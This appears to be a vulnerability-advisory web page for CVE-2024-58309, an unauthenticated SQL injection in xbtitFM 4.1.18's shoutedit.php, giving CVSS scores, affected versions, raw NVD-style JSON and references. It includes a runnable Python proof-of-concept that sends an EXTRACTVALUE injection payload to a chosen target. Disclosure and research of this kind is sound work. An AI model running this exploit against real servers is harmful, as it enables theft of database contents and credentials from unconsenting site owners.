Security Vulnerability Report
中文
CVE-2024-58309 CVSS 9.8 CRITICAL

CVE-2024-58309

Published: 2025-12-11 22:15:52
Last Modified: 2025-12-30 19:50:51
Source: [email protected]

Description

xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries by injecting malicious SQL code through the msgid parameter. Attackers can send crafted requests to /shoutedit.php with EXTRACTVALUE functions to extract database names, user credentials, and password hashes from the underlying database.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:xbtitfm:xbtitfm:4.1.18:*:*:*:*:*:*:* - VULNERABLE
xbtitFM 4.1.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import argparse def exploit_sql_injection(target_url, payload): """ CVE-2024-58309 SQL Injection PoC for xbtitFM 4.1.18 Target: shoutedit.php msgid parameter """ # Target endpoint url = f"{target_url}/shoutedit.php" # SQL injection payload using EXTRACTVALUE # This payload extracts the database version data = { 'msgid': payload, 'action': 'edit' } try: # Send POST request without authentication response = requests.post(url, data=data, timeout=10) # Check for SQL error messages containing extracted data if 'XPATH' in response.text or 'EXTRACTVALUE' in response.text: print(f"[+] Injection successful!") print(f"[+] Response excerpt: {response.text[:500]}") else: print(f"[-] No obvious SQL injection response") print(f"[-] Status code: {response.status_code}") except requests.RequestException as e: print(f"[-] Request failed: {e}") # Example payloads if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2024-58309 SQL Injection PoC') parser.add_argument('--url', required=True, help='Target base URL (e.g., http://target.com)') parser.add_argument('--payload', default="1' AND EXTRACTVALUE(0,CONCAT(0x7e,version()))-- -", help='SQL injection payload') args = parser.parse_args() print(f"[*] Exploiting CVE-2024-58309 on {args.url}") exploit_sql_injection(args.url, args.payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58309", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:52.487", "lastModified": "2025-12-30T19:50:50.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries by injecting malicious SQL code through the msgid parameter. Attackers can send crafted requests to /shoutedit.php with EXTRACTVALUE functions to extract database names, user credentials, and password hashes from the underlying database."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xbtitfm:xbtitfm:4.1.18:*:*:*:*:*:*:*", "matchCriteriaId": "B8A361AE-CCCA-460B-98A8-E2E39DA52BAD"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51909", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/xbtitfm-unauthenticated-sql-injection-in-shouteditphp", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xbtitfm.eu", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.